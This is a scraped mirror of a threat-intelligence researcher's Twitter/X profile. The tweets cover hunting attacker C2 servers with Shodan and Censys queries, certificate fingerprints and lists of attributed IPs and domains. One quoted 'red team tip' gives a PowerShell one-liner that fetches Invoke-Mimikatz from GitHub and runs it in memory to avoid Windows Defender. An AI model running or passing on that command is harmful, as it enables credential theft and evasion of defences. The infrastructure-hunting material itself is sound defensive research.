Michael Koczwara
@MichalKoczwara
Followers
19,571
Following
1,678
Media
503
Statuses
7,149
Founder @Intel_Ops_io Threat Intelligence, Adversary Infrastructure Hunting, Curated TI Feed (Coming Soon)
Warsaw
Joined April 2010
Don't wanna be here?
Send us removal request.
Explore trending content on Musk Viewer
Iran
• 560800 Tweets
Kyle
• 297638 Tweets
Shapiro
• 275846 Tweets
Sunderland
• 185520 Tweets
アザラシ幼稚園
• 115521 Tweets
Mascherano
• 78840 Tweets
Emily
• 76199 Tweets
pastor
• 71829 Tweets
Andrade
• 65821 Tweets
#LISAxBrandNewDía
• 57126 Tweets
Adele
• 53312 Tweets
İsrail
• 41559 Tweets
Angola
• 39966 Tweets
#SmackDown
• 36004 Tweets
残高不足
• 34745 Tweets
FGOフェス
• 26056 Tweets
Lamar
• 25919 Tweets
ロッキン
• 23990 Tweets
準々決勝進出
• 22402 Tweets
ムビチケ
• 22051 Tweets
Aerosmith
• 20754 Tweets
STRAY KIDS DOMINATE LOLLA
• 17116 Tweets
Mahomes
• 14125 Tweets
オベロン
• 13539 Tweets
バス会社
• 12954 Tweets
はちみつの日
• 10648 Tweets
Last Seen Profiles
Pivoting from VirusTotal to Shodan and uncovering all threat actor infra (BRc4) 🎯
Let's grab this hash/badger implant (BRc4)
086d6f54b51a368d0a836ad8e24df659
Looks like the badger implant is connecting to this IP address -> 51.77.112.254
Now let's check IP with Shodan and
21
241
946
Highly recommend using Shodan/filters to track/hunt adversaries' infrastructure and C2
Cobalt Strike
MSF
Covenant
Mythic
Brute Ratel C4
The Shodan Membership is on sale now for $5 until the end of Sunday, July 17th (GMT):
217
1K
2K
24
302
932
My last blog in 2022 💎
Adversaries Infrastructure-Ransomware Groups, APTs, and Red Teams 🎯
What you can learn from scanning adversaries' infra?
Happy Hunting and see you next year! 🤘
19
176
599
Sneak peek🔥
Already 42 pages on Hunting Lazarus Group🇰🇵 with practical examples/step-by-step walkthrough and is not finished yet.
In this module, you will learn cool pivoting techniques!
27
83
543
Cobalt Strike Hunting with
@shodanhq
Default cert:
ssl.cert.serial:146473198
example
725 hits
5
197
521
Cobalt Strike redirector technique used recently by Russian APT29/Nobellium ⚡️
This is a Red Team technique (T1090.002 External Proxy)
to hide C2 behind a legit website.
This could be very useful for Threat Hunters/Intel to set up a hypothesis/monitor
13
177
518
I mapped active Cobalt Strike servers in the wild (over 450). Some of them could be legit Red Team Ops. However, the majority probably belongs to APT/Ransomware groups.
cc
@cyb3rops
11
162
518
Hunting Havoc C2 🎯
Sometimes Threat Actors change certificates from defaults to custom ones, for example👇
165.227.106.175 <- Our hypothesis this could be Havoc C2
Looks like this IP is running with the LetsEncrypt certificate
Now let's investigate this case🕵️♂️
12
133
508
I just wonder if anyone would be interested in the course (not sure which format yet) about Hunting Malicious Infrastructure/C2.
I am thinking about step-by-step practical examples of how to hunt for C2/redirections and various Threat Actors infra (Lazarus Group, APT28, APT29,
89
36
483
Hunting Malicious Infrastructure using JARM and HTTP Response 🎯
I have described my processs and methodology you can apply when hunting malicious infrastructure with two practical examples 👇
QBot C2 Infrastructure
Brute Ratel C4
Hope you can find it
18
159
468
Last night APT10, APT28, APT29, APT41, and FIN7 DM me here on Twitter and said that my tweets revealed their poor opsec practices so now they will make a few changes:
Changes:
APT28 is not going to use Cobalt Strike anymore and they will use Koadic C3 from today.
APT29 Cobalt
12
82
416
Hunting Adversary Infrastructure Training update! 🔥
The training will start from the basics and the main objective will be to help you develop your own hunting methodologies.
If you are interested you can sign up here 👇
All details are in the slides.
17
90
406
Threat Actors from 🐼
Brute Ratel C4, Cobalt Strike C2 and some other exploits! 👀 (and obviously bash with creds 😆)
14
62
344
I am thrilled to announce the launch of my new Training Platform focused on teaching you the essentials of Hunting and Tracking Adversarial Infrastructures, including Advanced Persistent Threats (APTs), Ransomware, and Criminal Groups 🔥
Stay tuned for
6
60
334
I haven't finished this yet buy this my next step regarding Cobalt Strike Hunting/Detection research.
Collection of Cobalt Strike resources for Blue Teamers/Hunters.
3
116
336
A few tips on how you can use Censys to hunt malicious infrastructure - opendirs 🎯
You can use just one query with a few changes.
For example, this is a good start 👇
(Directory listing for msf4) and .vendor=`Python Software Foundation`
5
106
330
QackBot infra 🎯
Hunting rule 👇
http.html_hash:501510358 ssl.jarm:"21d14d00021d21d21c42d43d0000007abc6200da92c2a1b69c0a56366cbe21"
Happy Hunting! 🎯
6
96
327
Cybersecurity "experts" be like... APTs in 2024 will be using Artificial Intelligence to create undetectable malware, payloads, zero-day exploits, cyber weapons, and probably some cyber nuclear bombs too🥱
Meanwhile, APTs (Muddy Water 🇮🇷)in 2024 🙃
10
48
326
Diamond Model 💎of Intrusion Analysis - Ransomware Group
What to look for
Patterns
Subnets Scanning
Default Certs
Shodan queries/filters
Opendir
Understanding of C2 (CS, Posh C2, etc)
Ports
Ransomware TTPs
Triage/VT analysis
CyberChef to decode PowerShell/extract Shellcode.
10
94
317
Additionaly you can also use
@shodanhq
for Hunting Sliver C2 Infrastructure
ssl:multiplayer ssl:operators
ssl:multiplayer ssl:operators ssl.jarm:"00000000000000000043d43d00043de2a97eabb398317329f027c66e4c1b01"
7
84
317
I think I got it finally 🤘
Hunting Havoc C2 🎯
63 hits
8
61
310
Threat Intel: Pivoting using Censys 🎯
A short blog on how can you pivot from one node to another and uncover a Threat Actor cluster/infra (Muddy Water 🇮🇷).
5
79
291
We recently added two new lessons to our course:
- Hunting ReverseSSH🎯
- Hunting BruteRatel C4🎯
Both lessons focus on teaching students how to hunt for malicious infrastructure that is not publicly detected and how to build effective hunt rules.
The IOCs from ReverseSSH and
5
35
279
Hunting Sliver C2 Infrastructure using Censys
(services.jarm.fingerprint: 00000000000000000043d43d00043de2a97eabb398317329f027c66e4c1b01) and services.port=`31337`
4
77
248
Apparently, one person is quite upset about my research. Well, dude if you are a red team and don't know how to hide and protect c2 then you are in the wrong job mate!😂
@cyb3rops
13
24
245
Cobalt Strike C2 - opendir with full logs, keys, payloads, etc 👀
118.31.68.168
6
42
238
Evilgophish infra 🎯
3.85.136.76
18.205.88.93
18.214.103.163
34.233.174.210
34.248.128.35
35.172.248.220
44.213.168.165
46.101.118.119
51.68.228.224
51.195.103.17
52.195.16.234
54.144.78.33
54.147.222.239
54.160.101.219
64.226.91.184
67.202.33.81
67.205.129.246
144.126.234.77
3
71
233
Hunting Responder 🎯
I guess this could be handy for Threat Intel (mapping TA infra) and Threat Hunters when looking for new hypothesis or when dealing with inexperienced pentesters (hardcoded string in the old version).
Responder hardcoded string/date you should look for (old
3
78
236
Hunting Adversary Infrastructure Training Update.
I am currently working on the syllabus for my upcoming training program, which will consist of approx 16 modules covering both theory and practical labs.
In this training, I will teach you how to hunt down Ransomware Groups,
Sneak peek🔥
Already 42 pages on Hunting Lazarus Group🇰🇵 with practical examples/step-by-step walkthrough and is not finished yet.
In this module, you will learn cool pivoting techniques!
27
83
543
6
55
234
A short article about how to manually extract C2, shellcode, and indicators of compromise from encoded Cobalt Strike PowerShell payload and perform basic analysis.
Thanks for some tips!
@reversinghub
7
77
232
Hunting Cobalt Strike Infra
Shodan filter product: "Cobalt Strike Beacon" is great but is not capturing all Cobalt Strike C2s and one of them is CS geacon_pro profile with foren.zik certificate.
So you can try below searches
Shodan ssl:foren.zik
3
63
220
Sometimes these ransomware Cobalt Strike gangs really crack me up like WTF? 😂🤦
18.217.142[.]56
Running cracked Cobalt Strike 4.0 on AWS with TS password as maga 😂🤦
@malwrhunterteam
9
38
217
As promised we dropped the second module related to Nation State Actors DPRK
Hunting Lazarus Group: APT43 Kimsuky/BlackBanshee 🇰🇵
@Intel_Ops_io
5
45
220
Ransomware Group and C2 seems to be still active
A few new files added
95.213.145.99
95.213.145.101
9
38
209
Hunting Havoc C2 infra 🎯
If you are interested to hunt C2s I recommend reading the GitHub source code because all info is usually there.
Havoc generates a number of certificates you should look for: ACME, Partners, Tech, Cloud, Synergy, Test, Debug + prefixes
4
44
211
You can track Deimos C2's using Shodan as well 🎯 🎯
http.html_hash:-14029177
Active C2's
5.101.5.196
5.101.4.196
80.211.130.78
3.133.59.113
3
48
210
APT Kimsuky/Black Banshee infra setup 💁🏻♂️
/cloudown.store
/27.255.81.120
/27.255.81.82
/27.255.81.108
/27.255.75.154
Fake 404 Not Found page
0
62
214
Recently
@josh_penny
and
@TLP_R3D
showed a few awesome examples of how to pivot SSH with Shodan to uncover Threat Actors infra and connect some dots 🕵️♂️
I will show you how you can do SSH pivoting with Censys and Havoc C2 as an example🤘
The goal is to uncover threat actors'
4
44
213
Hunting VIPER Red Team operation platform
Hunting query
sha1:cd40dbcdae84b1c8606f29342066547069ed5a33
Happy Hunting! 🎯
5
51
205
I have updated my blog on how to look for less known adversaries C2 Viper, ARL, and well-known Red Team tool Night Hawk C2
Hunting C2/Malicious infra 🎯
Cobalt Strike, MSF, Covenant, Deimos, Posh C2
BRC4, Mythic, Sliver, Evilgnix, Gophish, IcedID
3
57
208
New additions to my books collection
No Shortcus - Why States Struggle to Develop a Military Cyber Force.
Offensive Cyber Operations.
The Lazarus Heist.
Tracers in the Dark.
The Ransomware Hunting Team.
If it is Smart it's Vulnerable.
10
28
206
This is simply not true. I tried to log in (bruteforce?) to my account and X blocked my account only after 5 unsuccessful attempts.
We have finished our investigation into last week's Mandiant X account takeover and determined it was likely a brute force password attack, limited to this single account.
87
146
539
15
22
200
Other Red Team tips here if anyone is interested!
Red Teamers, are you tired of Windows Defender deleting mimikatz.exe? Try this instead:
(new-object net.webclient).downloadstring('
https://raw.githubusercontent[.]com/BC-SECURITY/Empire/main/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1')|IEX;inv
#redteamtips
15
159
619
5
45
200
This week we will release a few lessons including hunting not publicly detected Brute Ratel.
Sneak peek
BruteRatel🎯
/splunkapi.com
/64.23.187.212
10
36
202
Dream Team! Assemble! 💪
BRC4 🦡
Evilginx 😈 🎣
Cobalt Strike ⚡️
and Havoc C2 🕷
170.250.131.155
12
44
197
Hunting Deimos C2 🎯
Threat Actors sometimes disable admin panels for some opsec for example, you can disable an obvious Deimos admin panel running on 7443 🤷♂️
However, you can still find Deimos C2 with a disabled admin panel 🤘
Just a few examples below and some hunting logic
3
52
194
Hunting Sliver C2 infra 🎯
Threat Actors when deploying Sliver C2 sometimes change default ports from 31337 to other ones for example 3000, 3306, 8089, and so on so scanning only 31337 is not always enough.
Censys filter below is checking Sliver default certificates also in
2
69
197
APT29/Nobelium🇷🇺 Initial Access Attack Analysis
HTML (EnvyScout) dropper used by Russian APT29/Nobelium in recent campaigns ⚡️
EnvyScout uses a technique known as HTML smuggling to deliver an IMG/ISO file to the targeted systems (data block that can be
1
60
194
Quick tip on how to use
@Shodan
to hunt for Sliver C2
ssl.jarm:3fd21b20d00000021c43d21b21b43d41226dd5dfc615dd4a96265559485910 "HTTP/1.1 404 Not Found" "Cache-Control: no-store, no-cache, must-revalidate" "Content-Length: 0"
Example
2
56
196
Hunting C2 redirections 🎯
Just with a few clicks, you can catch all of them nicely 🤝
Threat Actor infra⚡️
/weatherth.com [namcheap register fresh one 7 days old]
/www.weatherjps.com
119.42.149.2
119.42.149.3
119.42.149.4
119.42.149.5
119.42.149.6
All of them are
3
64
193
Hunting PoshC2 using Shodan
ssl:"P18055077"
Active C2's
34.235.5.141
192.18.141.199
20.210.158.139
95.213.145.101
149.28.254.42
61.220.191.84
159.65.184.179
95.213.145.99
150.136.140.174
149.167.94.36
18.135.28.6
61.220.191.84
Happy Hunting!🎯
2
60
192
Hunting Mythic C2 🎯 when 7443 default port is turned off
Example 🤘
/44.213.147.172
/dental-delta.com
default Mythic port 7443 is turned off but threat actors still need to learn (or maybe not?) a bit about opsec xD
My hunting filter in Shodan
HTTP/1.1 404 Not Found Server:
7
59
189
Threat Actors from China 👀
114.116.55.107:8900
Bit of everything from Cobalt Strike C2, Xray, Jindi Exploits, Struts scan, Burp, some other stuff, and obviously Stowaway.
7
36
182
Cobalt Strike C2 opendir here with full of exploits, logs, keys and other stuff
Cobalt Strike Server Found
C2: HTTP @ 139[.]224[.]114[.]70:80
C2 Server: 139[.]224[.]114[.]70,/IE9CompatViewList[.]xml
Country: China
ASN: AS37963
#C2
#cobaltstrike
0
3
15
6
36
181
Sliver C2 infra in one tweet 😆
263 IPs most of them run Sliver on 31337 but there are also quite a lot of unusual ones
There is also overlap with Cobalt Strike, Mythic, Deimos, and so on as TA runs multiple C2 on the servers 🤷♂️
1.13.174.161
3.8.115.155
3.128.135.199
7
59
181
Hunting Responder and pivoting with certificates🎯
Starting point 👇
Responder running on -> 167.172.44.218
Pivoting on certs ⚡️
services.tls.certificates.leaf_data.issuer_dn="CN=PenTeraCA"
Threat Actor/Red Team infra running Pentera Red Team tools and Responder🔥
2
47
180
LAPSUS$ TTPs mapped to MITRE ATT&CK Framework
4
55
178
In February, we'll release modules/lessons on👇
A comprehensive guide about tracking Sliver C2 🔥
Hunting Cobalt Strike redirectors ⚡️ (APT29 style)
Using the Diamond Model of Intrusion Analysis 💎
Hunting APT38 and APT43 part 2 🇰🇵
Magecart 🧙♂️
Tips for open directories 🕵️
and
6
33
178
I have scanned (again) malicious infrastructure and I was able to find out (again) an open directory with a bunch of interesting files (malicious DLLs and Sliver implants)
I picked up one DLL and tried to understand how is connected back to the C2.
2
47
176
🇰🇵Looks like Lazarus (APT38) is well prepared👍
New infra and more fakes on Linkedin🥷
/fenbushi.private-meet.online
/private-meet.online
@Intel_Ops_io
8
42
177
Added over 800 new Cobalt Strike servers to my list:
Mapping adversaries' infrastructure.
3
46
174
Dear Threat Actors quick reminder ⚡️
Your password doesn't matter🤷♂️
#cyberawanessmonth
Cobalt Strike C2 and TS creds
43.206.152.100 PwC
@Hyd
#500081
13.231.199.195 PwC
@Hyd
#500081
Also password reuse really? 😂
Cobalt Strike Server Found
C2: HTTP @ 43[.]206[.]152[.]100:80
C2 Server: 43[.]206[.]152[.]100,/j[.]ad
Country: Japan
ASN: AMAZON-02
#C2
#cobaltstrike
0
2
9
9
54
171
🇰🇵Lazarus (APT38) is active again, this time impersonating
@NGC_Ventures
and one of its employees.
Peonie Elis is a fake profile (the person from this picture is Wei Hao Partner from Sky9Capital).
@Intel_Ops_io
has noticed this behavior for a while. Lazarus typically starts by
4
42
164
APT43/Kimsuky (Black Banshee)🇰🇵
/141.11.95.135
/67.217.60.68
/67.217.62.219
/185.141.171.31
/185.203.119.14
/note.iiiii.info
/share-defence.uberlingen.com
/imagedownload.ignorelist.com
/signin-ym.quest
/mnlp.quest
/oso-usps.com
/drives.youramys.com
/www.uidlogin.o-r.kr
8
39
165
I just had a nice conversation with the Threat Actor😅
Anyway, guys please don't fall into such lame social engineering traps.
Threat Actor TTPs 👇
Social Engineering via X
Impersonation of Calendly
calendsly[.]cc
Arranging meetings or granting access
18
22
164
Next week, we're excited to add several new modules/lessons, bringing our March total to around 37 lessons.
Want to access this training for free?
Simply repost, like, and share in the comments how this training could benefit your career or day-to-day
35
65
153
An automated script that download potential exploit for linux kernel from exploitdb, and compile them automatically
0
79
149
Hunting Muddy Water 🇮🇷 with
@ValidinLLC
DNS records host mshta.exe/command line queries in TXT records🎯
@Intel_Ops_io
Come and join and we will teach you how to hunt adversaries!
/mason.burton.onionmail.org and linked Muddy Water domains
2
28
152
#RedTeamTips
when choosing your password for Cobalt Strike Team Server make sure to include also special characters to make it password uncrackable
for example, this is a very good password! 👌
ABC
@123123
@#
10
23
145
Pivoting to find more APT Muddy Water related Infra 🇮🇷
37.120.237.204:443
37.120.237.248:443
146.70.124.102:443
MuddyWater confirmed:
1f0b9aed4b2c8d958a9b396852a62c9d
a.storyblok[.]com/f/259791/x/94f59e378f/questionnaire.zip
This time it is SimpleHelp
065f0871b6025b8e61f35a188bca1d5c
146.70.149[.]61:8008
@KseProso
@Israel_Cyber
1
12
35
5
37
148
Hunting Evilginx Infrastructure 🎯
165.22.30.136
165.227.198.201
46.101.184.179
23.99.193.156
20.172.22.144
Body Hash
sha1:b18d778b4e4b6bf1fd5b2d790c941270145a6a6d
Default ports 3000 or 4000
6
33
147
Hunting Posh C2 🎯
You can fingerprint Threat Actors infra even when they change default certs 🤷♂️
Hunting rule 👇
0
46
138
Let's continue with Brute Ratel C4 Hunting 🎯
Last time we started from VT/hash attributed to badger implant, we grabbed one JARM from BRc4 C2 51.77.112.254 and combined with the HTTP Response hash.
Today we will pivot from another Brute Ratel C4 JARM and we will find more
Pivoting from VirusTotal to Shodan and uncovering all threat actor infra (BRc4) 🎯
Let's grab this hash/badger implant (BRc4)
086d6f54b51a368d0a836ad8e24df659
Looks like the badger implant is connecting to this IP address -> 51.77.112.254
Now let's check IP with Shodan and
21
241
946
2
37
139
I had a look at Conti Ransomware Group Cobalt Strike C2 Infrastructure and analyzed the beacons.
Short summary:
All Cobalt Strike servers C2 were exposed to the internet.
4
58
141
Interesting how TA is switching from Cobalt Strike to Sliver
In 2021 Cobalt Strike and now in 2022 Sliver C2
23.224.135.138
23.224.135.139
23.224.135.140
23.224.135.141
23.224.135.142
3
38
133
We are also hunting and tracking DPRK/Lazarus Group as well🎯
🇰🇵APT38 Bluenoroff cluster (Lazarus Group)🔥
/104.168.136.24 (0/90 VT)
/104.168.151.70 (0/90 VT)
/104.168.151.34 (0/90 VT)
/104.168.145.52 (0/90 VT)
/2607:5501:3000:155d::2 (0/VT)
/appleupdate.datauploader.site (0/90
2
37
136
🇰🇵Lazarus (APT38) is not giving up👍
/104.168.203.161
/ngc.regular-meeting.site
/regular-meeting.site
@Intel_Ops_io
3
31
128
Hunting Threat Actors C2 redirections 🎯
Fake Amazon website 👀
109.205.56.203
/bucket-amazon.com -> registered with namesilo[.]com 🤷♂️
redirecting to legit
https://signin[.]aws[.]amazon[.]com
and another one 👀
45.156.25.14
/softproxyapi.com [y.polyakov
@protonmail
.com -
3
34
124
Mom, can we have APT?
No, there is APT at home.
APT at home ...
16
10
125
Evilginx 👹
miicrossofftonline[.]nl 🎯
operating behind CloudFlare ☁️
4
16
123
This is a great finding from
@drb_ra
from this one node 37.220.31.54 you can pivot with Censys and Shodan and uncover Bianlian C2 Infrastructure 🔥
(Unverified) Bianlian Go Trojan Found
C2: 37[.]220[.]31[.]54:443
Country: United Kingdom (AS20860)
ASN: IOMART-AS
#c2
#Bianlian
#unverified
0
1
6
0
31
122
Update on Adversary Infrastructure Hunting Course.
We've finished the first phase of our course content, covering 28 modules on tracking APTs, criminal groups, and C2 frameworks. The feedback from our students has been positive and helpful. Our students come from a wide range of
3
12
123
Happy Saturday! 🎯
Cobalt Strike C2 ⚡️
120.46.177.219 🐼
threat actor (cheniu) logs, keys, tools, agent tesla, passwords, etc.
3
19
117
Hey, how many Cobalt Strike do you need? ⚡️
175.178.73.224
-CobaltStrike
-cobaltstrike4.0
-cobaltstrike45+agent
-CS4.4
-K8_CS_4.4_20211109
6
21
118
Introducing a new module - Hunting Cobalt Strike with
@ValidinLLC
Students will learn how to use Validin to hunt malicious infrastructure.
In the first lesson, we will examine several Red Team Cobalt Strike examples, focusing on how to hunt them and identifying common
2
19
115
Current situation!
and read the logs so you will understand the difference between the victims and the targets!
3
19
113
Thanks everyone for playing 🙏
Here is the Lazarus one 🥷🇰🇵
2
14
112